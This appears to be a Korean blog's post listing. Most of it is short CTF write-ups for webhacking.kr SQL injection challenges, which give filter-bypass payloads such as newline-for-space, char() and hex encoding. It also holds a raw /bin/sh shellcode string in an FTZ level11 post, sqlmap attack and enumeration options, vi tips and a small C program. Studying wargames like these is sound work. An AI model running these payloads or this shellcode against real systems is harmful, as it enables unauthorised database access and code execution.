49번 46번과 매우 흡사하다. 필터링만 늘었다.괄호를 못 써서 char함수를 못 쓴다.대신 필터링에서 0x가 빠져서 id=0x61646d696e로 우회가 가능하다.or는 ||로 우회해준다. ?lv=2||id=0x61646d696e write-up/webhacking.kr 2016.03.29
46번 쿼리 select id,cash from members where lv=$_GET[lv] lv=1만 반응한다. 곧+--------+-----+---+| id | cash | lv |+--------+-----+---+| zzibong | 10000 | 1 |+--------+-----+---+ id를 admin으로 만들어야하므로?lv=0 or id='admin' 공백은 %0a로, 쿼터는 char함수로 우회해준다. (0x도 필터링됨) ?lv=0%0aor%0aid=char(97,100,109,105,110) write-up/webhacking.kr 2016.03.28
18번 쿼리select id from challenge18_table where id='guest' and no=$_GET[no] guest의 no값은 1이다. admin으로 로그인해아하는데 추정할 수 있는 table의 형태는 +-----+---+| id | no |+-----+---+| guest | 1 || admin | 2 |+-----+---+ no=0 or no=2를 주면 되는데 공백이 필터링된다 깔끔하게 %0a로 우회해준다. ?no=0%0aor%0ano=2 write-up/webhacking.kr 2016.03.28
webhacking.kr SQL Injection webhacking.kr SQL Injection 문제 3/28 시작 2 (500)7 (300) - 4/9 클리어8 (350) - 4/1 클리어9 (900) - 7/17 클리어13 (1000) - 8/22 클리어18 (100) - 3/28 클리어21 (250) - 3/28 클리어22 (500) - 8/23 클리어35 (350) - 3/31 클리어40 (500) - 3/31 클리어45 (550) - 4/3 클리어46 (300) - 3/28 클리어49 (300) - 3/28 클리어50 (450) - 3/29 클리어51 (250) - 4/3 클리어53 (350) - 3/31 클리어55 (400) - 4/9 클리어56 (250) - 3/31 클리어57 (600) - 4/3 클리어59 (200) - 7/8 클리어 write-up/webhacking.kr 2016.03.28
[FTZ] level11(Nop Sled) http://blog.naver.com/sthellfire/220642140398 쉘코드\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 문서/시스템 문서 2016.03.15
Smashing The Stack For Fun And Profit을 읽으려는 분들에게 http://huammmm1.tistory.com/502 문서/시스템 문서 2016.03.15
sqlmap 사용법 옵션설명 -h : 도움말-hh : 상세도움말 $ python sqlmap.py -u "https://test.com/index.php" --data="id=a&pw=a" -p "pw" --random-agent --dbms=mysql --level=5 --risk=3 --threads=10 -u : URL--data : post로 넘길 때-p : 공격할 parameter--random-agent : user-agent 넣고 실행--level--dbms=mysql : dbms설정--threads : 쓰레드 설정 (속도) --dbs : DB리스트 캐내기 (Enumerate)--tables : table 리스트 캐내기--columns : 컬럼 캐내기 -D "c9" : DB지정-T "guestbook" : 테이.. 웹/웹_기타 2016.03.06
vi 팁 vi에서 블록 설정하기 v를 누르면 visual모드가 된다 !V는 줄 단위 블록처리 이 상태에서.... (0) > : > 를 하면 단체 들여쓰기(1) y : y는 복사 (yank : 확 잡아땡긴다)(2) p : p는 붙여넣기 (put, paste)(3) d : 지우기블록 친 상태에서d를 누르면 지워진다. 그리고, 블록 친 상태에서 =를 누르면 자동 들여쓰기가 된다 !!esc를 누르고 gg=G를 누르면 전체 자동 들여쓰기. Linux 2014.11.20
단어 수 세기 프로그램 #include int main () { char arr[500]; int cnt = 0; int i = 0; printf("give your sentence : "); scanf("%[^\n]", arr); while (arr[i]!='\0') { if (arr[i]==' ') cnt++; i++; } printf("words : %d\n", cnt+1); } Programming/C 2014.11.12
